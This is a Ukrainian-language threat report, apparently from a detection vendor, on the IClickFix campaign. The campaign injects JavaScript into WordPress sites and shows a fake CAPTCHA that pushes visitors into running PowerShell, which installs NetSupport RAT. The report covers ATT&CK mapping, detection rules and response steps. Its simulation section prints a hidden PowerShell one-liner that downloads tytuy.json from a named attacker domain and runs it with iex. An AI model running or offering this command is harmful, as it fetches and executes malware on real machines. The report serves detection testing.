Знайомтесь з IClickFix: Широковживана структура для атак на WordPress, що використовує тактику ClickFix
Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
У звіті описано IClickFix, зловмисний JavaScript-фреймворк, який компрометує сайти WordPress і представляє підроблений CAPTCHA в стилі Cloudflare Turnstile. Приманка змушує відвідувачів виконати команду PowerShell, яка завантажує та встановлює NetSupport RAT. Доставка підтримується системою розподілу трафіку, побудованою навколо скорочувача URL YOURLS і набору ротаційних доменів-переходів. Дослідники виявили понад 3800 компрометованих сайтів WordPress, які обслуговують цей ланцюг глобально з кінця 2024 року.
Розслідування
Аналітики Sekoia ідентифікували впроваджений JavaScript-тег ic-tracker-js на компрометованих сайтах, а потім відновили потік переадресації через кілька короткочасних доменів. Вони захопили точну модель виконання PowerShell, що використовувалася для отримання кінцевого навантаження і відновили скинуті компоненти NetSupport RAT разом із відповідними індикаторами інфраструктури C2.
Захист
Контролюйте веб-контент на предмет ic-tracker-js інєкцій та блокуйте відомі зловмисні домени, ре-даректори й сервіси коротких посилань, які використовуються в ланцюзі. На кінцевих точках знайдіть шаблони завантаження та виконання PowerShell, що збігаються з приманкою ClickFix. Додайте покриття для створення файлів клієнта NetSupport і стійкість через користувацькі Run ключі реєстру.
Відповідь
Коли з’являються індикатори, ізолюйте кінцеву точку, зупиніть активний процес PowerShell і видаліть бінарні файли NetSupport разом із будь-якою стійкістю на основі реєстру. Далі проведіть повний судовий аналіз, щоб підтвердити, що атакуючий не розгорнув додаткові імпланти або не встановив вторинні шляхи доступу.
graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#cccccc %% Action Nodes action_initial_access[“<b>Дія</b> — <b>T1190 Експлуатація публічно доступного застосунку</b><br/>Компрометація сайтів WordPress шляхом експлуатації вразливостей ядра або популярних плагінів (Elementor, WooCommerce, Gravity Forms).”] class action_initial_access action action_content_injection[“<b>Дія</b> — <b>T1659 Інʼєкція вмісту</b><br/>Впровадження шкідливого JavaScript із тегом <i>icu2011trackeru2011js</i> у скомпрометовані сторінки для завантаження скриптів, контрольованих зловмисником.”] class action_content_injection action action_software_extensions[“<b>Дія</b> — <b>T1176 Програмні розширення</b><br/>Використання вразливих плагінів WordPress як розширень для забезпечення стійкості шкідливого коду на сайті.”] class action_software_extensions action action_dynamic_resolution[“<b>Дія</b> — <b>T1568 Динамічне розвʼязання</b><br/>Застосування скорочувача YOURLS і ланцюга доменів (наприклад, ksfldfklskdmbxcvb.com) для розвʼязання та доставки корисного навантаження з фільтрацією ботів.”] class action_dynamic_resolution action action_obfuscated_payloads[“<b>Дія</b> — <b>T1027 Обфусковані або збережені файли</b><br/>Кодування JavaScript першого етапу та завантажувача PowerShell у Base64 і поділ рядків для обходу виявлення.”] class action_obfuscated_payloads action action_user_execution[“<b>Дія</b> — <b>T1204.001 Виконання користувачем: шкідливе посилання</b><br/>Жертви переходять за скомпрометованим URL WordPress, що запускає ланцюг перенаправлень.”] class action_user_execution action action_input_injection[“<b>Дія</b> — <b>T1674 Інʼєкція введення та T1204.004 Шкідливе копіювання-вставлення</b><br/>JavaScript записує команду PowerShell у буфер обміну та відображає фальшиву CAPTCHA Cloudflare Turnstile.”] class action_input_injection action action_powershell[“<b>Дія</b> — <b>T1059.001 PowerShell</b><br/>Виконується прихована команда PowerShell, яка завантажує скрипт другого етапу <i>tytuy.json</i> та встановлює NetSupport RAT.”] class action_powershell action action_persistence[“<b>Дія</b> — <b>T1547.014 Автозапуск під час завантаження або входу: Active Setup</b><br/>Створення ключа реєстру Run, що вказує на <i>client32.exe</i> у ProgramData\\S1kCMNfZi3, для забезпечення запуску при старті системи.”] class action_persistence action action_c2[“<b>Дія</b> — <b>T1102.002 Вебсервіс: двосторонній звʼязок</b><br/>NetSupport RAT здійснює обмін даними через HTTPS із доменами, контрольованими зловмисником (наприклад, nightlomsknies.com/fakeurl.htm).”] class action_c2 action action_data_obfuscation[“<b>Дія</b> — <b>T1001 Обфускація даних</b><br/>Обфускація трафіку керування та керованих корисних навантажень для приховування шкідливої активності.”] class action_data_obfuscation action %% Tool / Malware / File Nodes tool_wordpress_core[“<b>Інструмент</b> — <b>Назва</b>: Ядро WordPress<br/><b>Вразливість</b>: Віддалене виконання коду”] class tool_wordpress_core tool tool_elementor_plugin[“<b>Інструмент</b> — <b>Назва</b>: Плагін Elementor<br/><b>Вразливість</b>: Віддалене виконання коду, специфічне для CVE”] class tool_elementor_plugin tool tool_yourls[“<b>Інструмент</b> — <b>Назва</b>: Скорочувач YOURLS<br/><b>Призначення</b>: Перенаправлення URL та динамічне розвʼязання”] class tool_yourls tool malware_netsupport[“<b>Шкідливе ПЗ</b> — <b>Назва</b>: NetSupport RAT<br/><b>Можливості</b>: Віддалене керування та ексфільтрація даних”] class malware_netsupport malware file_client32[“<b>Файл</b> — <b>Назва</b>: client32.exe<br/><b>Розташування</b>: ProgramData\\S1kCMNfZi3”] class file_client32 file file_tyuy_json[“<b>Файл</b> — <b>Назва</b>: tytuy.json<br/><b>Призначення</b>: PowerShell-скрипт другого етапу”] class file_tyuy_json file %% Connections action_initial_access –>|експлуатує| tool_wordpress_core tool_wordpress_core –>|забезпечує доступ| action_content_injection action_content_injection –>|впроваджує скрипт через| tool_elementor_plugin action_content_injection –>|призводить до| action_software_extensions action_software_extensions –>|забезпечує стійкість через| tool_elementor_plugin action_software_extensions –>|активує| action_dynamic_resolution action_dynamic_resolution –>|використовує| tool_yourls action_dynamic_resolution –>|доставляє| action_obfuscated_payloads action_obfuscated_payloads –>|створює| action_user_execution action_user_execution –>|ініціює| action_input_injection action_input_injection –>|записує команду в буфер обміну| action_powershell action_powershell –>|завантажує| file_tyuy_json file_tyuy_json –>|встановлює| malware_netsupport malware_netsupport –>|встановлює| action_persistence action_persistence –>|створює| file_client32 file_client32 –>|виконується під час запуску| action_c2 malware_netsupport –>|звʼязується з| action_c2 action_c2 –>|використовує| action_data_obfuscation
Потік атаки
Виявлення
Завантаження або завантаження через Powershell (через cmdline)
Перегляд
Підозрілі файли в загальному профілі користувача (через file_event)
Перегляд
Можливість виконання через приховані командні рядки PowerShell (через cmdline)
Перегляд
Підозріле використання Invoke-RestMethod (через powershell)
Перегляд
Можлива спроба виконання бінарного файлу NetSupport Manager з підозрілого каталогу (через process_creation)
Перегляд
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через registry_event)
Перегляд
IOC (HashSha256) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix
Перегляд
IOC (DestinationIP) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix
Перегляд
IOC (SourceIP) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix
Перегляд
Виявлення ін’єкції шкідливого JavaScript IClickFix [Вебсервер]
Перегляд
Виконання команд PowerShell для доставки NetSupport RAT [Windows Powershell]
Перегляд
Імітаційне виконання
Необхідна умова: Перевірка телеметрії й попереднього завантаження базових даних повинна пройдено.
-
Оповідь про атаку та команди:
Противник, що отримав початковий доступ до кінцевої точки, хоче встановити постійний доступ шляхом доставки NetSupport RAT. Щоб уникнути інтерактивного виявлення, вони запускають PowerShell у прихованому режимі без профілю або логотипу (
-w hidden -nop -c). Потім вони використовуютьInvoke-WebRequest(iwr) для завантаження шкідливого JSON-навантаження (tytuy.json), який містить сценарій PowerShell для RAT. Сценарій записується до тимчасового каталогу і виконується черезInvoke-Expression. Ця точна командна лінія відповідає рядкам, які моніторить правило Sigma. -
Тестовий сценарій рецидиву:
# PowerShell однолінійний сценарій, який відповідає правилу виявлення $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Команди очищення:
# Видалити завантажене навантаження та будь-які залишкові процеси PowerShell Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force